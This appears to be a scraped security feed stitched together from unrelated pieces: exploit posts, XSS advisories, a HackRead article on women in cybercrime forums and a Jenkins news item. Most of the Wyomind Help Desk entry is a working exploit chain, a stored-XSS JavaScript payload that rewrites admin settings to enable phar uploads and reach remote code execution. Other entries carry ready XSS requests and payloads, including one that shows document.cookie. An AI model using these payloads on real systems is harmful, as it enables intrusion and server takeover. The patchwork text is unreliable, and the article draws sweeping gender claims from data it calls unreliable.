Real Time Automation 460MCBS version 5.2.14 suffers from a cross site scripting vulnerability.

    Exploit Title:  Real Time Automation 460MCBS Cross Site Scripting (XSS)Date: 2023-03-09Exploit Author: Yehia ElghalyVendor Homepage: https://www.rtautomation.com/Software Link: https://www.rtautomation.com/product/460mcbs/Version: Revision 5.2.14Tested on: Real Time Automation CVE: N/ASummary: The Real Time Automation  460MCBS moves data between up to 32 Modbus TCP Servers and a BACnet/IP Building Automation System (BAS). It’s a perfect tool to tie Modbus TCP power meters, boilers, chillers and other devices into your BACnet/IP Building Automation SystemDescription: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: XSS found on when insert a payload after(/)Payload: ?c12yy<script>alert('XSSYF')</script>p1ax8=1[Affected Component](/)

Real Time Automation 460MCBS 5.2.14 Cross Site Scripting

Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.19.

**Cross-site Scripting (XSS) in pimcore/pimcore**

Moderate severity GitHub Reviewed Published Mar 9, 2023 to the GitHub Advisory Database • Updated Mar 15, 2023

GHSA-8jv7-vwrc-mv4g: Cross-site Scripting (XSS) in pimcore/pimcore

CVE-2023-1286

By Habiba Rashid
It turns out that the number of women on the darker side of cybersecurity is increasing, and these stats will shock you.
This is a post from HackRead.com Read the original post: Gender Diversity in Cybercrime Forums: Women Users on the Rise

****According to the report, 36% of users at Hackforums were likely women, based on their use of language, and 30% of XSS forum users, a Russian language cybercrime forum, were reportedly women.****

In recent years, there has been a shift toward increased gender equality in **underground cybercriminal forums**. This stands in stark contrast to the more male-dominated cybersecurity industry, where women continue to face significant barriers to entry and advancement.

A recently published **study** by Trend Micro pushes forward a similar finding wherein at least 30%, if not more, of cybercriminal forum users, are women. Although the methodology used makes the results of the study somewhat unreliable, the report itself recognizes this. 

Trend Micro inspected five English-language cybercrime forums: Sinister, Cracked, Breached, Hackforums, and **(now defunct and seized) Raidforum**, as well as five Russian-language sites: XSS, Exploit, Vavilon, BHF, and WWH-Club.

Since these sites are frequented by largely anonymous users, tools such as Semrush and uClassify’s Gender Analyzer V5 were used to estimate the number of female users.

According to the report, 36% of users at **Hackforums** were likely women, based on their use of language, and 30% of XSS forum users were reportedly women, based on the same analysis. At first glance, these numbers indicate that cybercriminal forums are more meritocratic than the white hat world, but this article will delve deeper to understand the reasons behind this difference. 

One reason for the gender diversity in cybercriminal forums is that these groups are often more decentralized and less hierarchical than traditional workplaces. This can make it easier for women to participate and contribute their skills without **fear of discrimination or harassment**.

It is important to understand that these forums have traditionally been male-dominated spaces where men exchange information, tools, and services related to cybercrime.

However, with the increased diversity in the cybersecurity industry over the years, more women have entered the field. As a result, there are now more women who possess the skills and knowledge necessary to participate in these forums.

But why is gender diversity not growing at an equal rate in the cybersecurity workforce? The reasons for this gender gap are complex and multifaceted. Women face a range of barriers to entry, including unconscious bias, stereotypes, and a lack of female role models and mentors in the industry. Additionally, the highly technical and male-dominated culture of cybersecurity can create a challenging environment for women to thrive.

According to a **2022 report** from Cybersecurity Ventures, women make up just 25% of the cybersecurity workforce, with even lower numbers in leadership roles. This gender gap is especially concerning, given the increasing demand for cybersecurity professionals and the potential consequences of a lack of diversity in this field.

One of the most significant reasons for the increase in the number of female users on cybercriminal forums is anonymity, which can be empowering for women who may face discrimination or harassment in the workplace.

In an **underground cybercriminal forum**, participants are judged solely on their skills and contributions, rather than their gender or other personal characteristics. This creates a level playing field where women can demonstrate their expertise and gain respect from their peers. As a result, women who seek out a gender-anonymous space have been increasingly drawn to these forums.

Lastly, the **rise of cryptocurrencies** has made it easier for women to participate in these forums. Traditionally, cybercriminals have used traditional payment methods, such as wire transfers or PayPal, to exchange money for tools and services.

Ilya Lichtenstein and his wife, Heather Morgan, were arrested in February 2022 and charged for their involvement in money laundering of funds stolen in the Bitfinex cryptocurrency hack of 2016.

Suzette Kugler, a 59-year-old US woman, was arrested for hacking the internal network of her employer, PenAir.

Valerie Gignac, a 27-year-old Canadian woman, was arrested in April 2015 for spying on people through webcams, harassing victims, and even owning a famous hacking forum with more than 35,000 members.

Eighteen-year-old Michaela Gabriella King carried out crippling DDoS attacks on her school system.

However, these methods are often difficult for women to use, as they may not have access to a bank account or a credit card. Cryptocurrencies, on the other hand, can be easily obtained and used anonymously, making it easier for women to participate in these forums.

What all of this proves is that women are not absent from the cybersecurity industry, but rather likely to be on the wrong side of it. Efforts to address gender inequality in cybersecurity are underway, with initiatives such as Women in Cybersecurity (WiCyS) and the National Cyber Security Centre’s CyberFirst Girls competition aimed at encouraging more women to pursue careers in this field.

However, progress has been slow, and it will likely take a concerted effort from the industry as a whole to truly move the needle on gender diversity. By addressing the underlying barriers to entry and fostering a more inclusive culture, we can create a more equitable and effective **cybersecurity workforce** where women with a passion for cybersecurity become a valuable part of the industry. 

1.  **Woman arrested for spying on people via webcams**
2.  **Woman hacked, leaked private pics of Selena Gomez**
3.  **Woman hacked airline network, busted through VPN logs**
4.  **Female DDoS attacker charged with crippling school system**
5.  **Husband and wife ransomware operators arrested in Ukraine**

Gender Diversity in Cybercrime Forums: Women Users on the Rise

A issue has been discovered in GitLab CE/EE affecting all versions from 15.3 prior to 15.7.8, version 15.8 prior to 15.8.4, and version 15.9 prior to 15.9.2 A cross-site scripting vulnerability was found in the title field of work items that allowed attackers to perform arbitrary actions on behalf of victims at client side.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

*   cves
*   2022
*   **CVE-2022-4007.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 1 new advisories · 74b7615b
    
    🤖 GitLab Bot 🤖 authored Mar 04, 2023
    
    74b7615b

CVE-2022-4007: 2022/CVE-2022-4007.json · master · GitLab.org / cves · GitLab

Directory Traversal vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before fixed in v.1.3.7 allows attacker to execute arbitrary code via the file attachment directory setting.

    # Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) 
    # Date: 2021-07-07
    # Exploit Author: Patrik Lantz
    # Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html
    # Version: <= 1.3.6
    # Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2
    
    
    The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and  unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.
    
    A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. 
    The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable
    the delivery of the XSS payload:
    
    POST /helpdesk/customer/ticket_save/ HTTP/1.1
    Host: <redacted>
    Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635
    Content-Length: 683
    Origin: https://<redacted>
    Connection: close
    Referer: https://<redacted>/helpdesk/customer/ticket_view/
    Cookie: <redacted>
    Upgrade-Insecure-Requests: 1
    
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="form_key"
    
    <redacted>
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="object"
    
    Hello
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="message_cc"
    
    
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="content"
    
    <p><script>alert(1)</script></p>
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="hideit"
    
    
    -----------------------------243970849510445067673127196635--
    
    
    
    The following XSS payload shown below can be used to trigger 
    
    1) Enabling file attachments in ticket messages
    2) Adding 'phar' to allowed file extensions
    3) Setting the attachment directory to 'helpdesk/files/../../../pub'
    
    
    <script>
    function successListener(e) {    
    	var doc = e.target.response
    	var action=doc.getElementById('config-edit-form').action;
    	
    	function submitRequest()
    	{
    	var formKey = FORM_KEY;
    	var xhr = new XMLHttpRequest();
    	xhr.open("POST", action, true);
    	xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053");
    	xhr.withCredentials = true;
    	var body = "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"form_key\"\r\n" + 
    	  "\r\n" + 
    	  formKey + "\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + 
    	  "\r\n" + 
    	  "\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "2\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "3\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + 
    	  "\r\n" + 
    	  "10000\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Support - My Tickets\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + 
    	  "\r\n" + 
    	  "jpeg,gif,png,pdf,phar\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + 
    	  "\r\n" + 
    	  "helpdesk/files/../../../pub\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + 
    	  "\r\n" + 
    	  "2M\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + 
    	  "\r\n" + 
    	  "4M\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Your message has been sent to the support team.\r\n" + 
    	  "Here is the message content:\x3cbr/\x3e\r\n" + 
    	  "\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Kind Regards,\r\n" + 
    	  "The Support Team.\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + 
    	  "Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Regards,\r\n" + 
    	  "The Support Team.\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "You received a new message from a customer.\r\n" + 
    	  "-----------------------------14303502862141221692667966053--\r\n";
    	var aBody = new Uint8Array(body.length);
    	for (var i = 0; i < aBody.length; i++)
    	aBody[i] = body.charCodeAt(i); 
    	xhr.send(new Blob([aBody]));
    	}
    	submitRequest();
    }
    	
    var request = new XMLHttpRequest();  
    request.onload = successListener;    
    request.responseType = 'document';
    request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true);  
    request.send();
    </script> 
    
    After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting
    
    https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar 
    
    ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the 
    URL, for example: 
    
    https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/
    
    and the messageId can be identified by hovering over the uploaded file link which will be similar to 
    
    https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar
    
    in this case, the messageId is 40.

CVE-2021-33353: Offensive Security’s Exploit Database Archive

A vulnerability, which was classified as problematic, has been found in IBOS up to 4.5.5. Affected by this issue is some unknown functionality of the file mobil/index.php. The manipulation of the argument accesstoken leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-222608.

CVE-2023-1278

A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

**Phone Shop Sales Managements System v1.0 has Cross-site scripting (reflected)**

BUG\_Author: Blair

Source code website address：https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html

Vulnerability File: /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php

Payload1:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(1111)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(1111)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=6fcav63hl60icb4n7tsvv0ns5k
    Connection: close
    

Payload2:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(document.cookie)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close

CVE-2023-1275: bug_report/XSS-1.md at main · blairting/bug_report

A pair of severe security vulnerabilities have been disclosed in the Jenkins open source automation server that could lead to code execution on targeted systems.
The flaws, tracked as CVE-2023-27898 and CVE-2023-27905, impact the Jenkins server and Update Center, and have been collectively christened CorePlague by cloud security firm Aqua. All versions of Jenkins versions prior to 2.319.2 are

A pair of severe security vulnerabilities have been disclosed in the Jenkins open source automation server that could lead to code execution on targeted systems.

The flaws, tracked as CVE-2023-27898 and CVE-2023-27905, impact the Jenkins server and Update Center, and have been collectively christened **CorePlague** by cloud security firm Aqua. All versions of Jenkins versions prior to 2.319.2 are vulnerable and exploitable.

"Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim's Jenkins server, potentially leading to a complete compromise of the Jenkins server," the company said in a report shared with The Hacker News.

The shortcomings are the result of how Jenkins processes plugins available from the Update Center, thereby potentially enabling a threat actor to upload a plugin with a malicious payload and trigger a cross-site scripting (XSS) attack.

"Once the victim opens the 'Available Plugin Manager' on their Jenkins server, the XSS is triggered, allowing attackers to run arbitrary code on the Jenkins Server utilizing the Script Console API," Aqua said.

Since it's also a case of stored XSS wherein the JavaScript code is injected into the server, the vulnerability can be activated without having to install the plugin or even visit the URL to the plugin in the first place.

Troublingly, the flaws could also affect self-hosted Jenkins servers and be exploited even in scenarios where the server is not publicly accessible over the internet since the public Jenkins Update Center could be "injected by attackers."

The attack, however, banks on the prerequisite that the rogue plugin is compatible with the Jenkins server and is surfaced on top of the main feed on the "Available Plugin Manager" page.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

This, Aqua said, can be rigged by "uploading a plugin that contains all plugin names and popular keywords embedded in the description," or artificially boost the download counts of the plugin by submitting requests from fake instances.

Following responsible disclosure on January 24, 2023, patches have been released by Jenkins for Update Center and server. Users are recommended to update their Jenkins server to the latest available version to mitigate potential risks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Jenkins Security Alert: New Security Flaws Could Allow Code Execution Attacks

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Menu module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#adminMenu/index

poc  
POST /admin1/adminMenu/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 145  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/adminMenu/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#adminMenu/index

Tag

#xss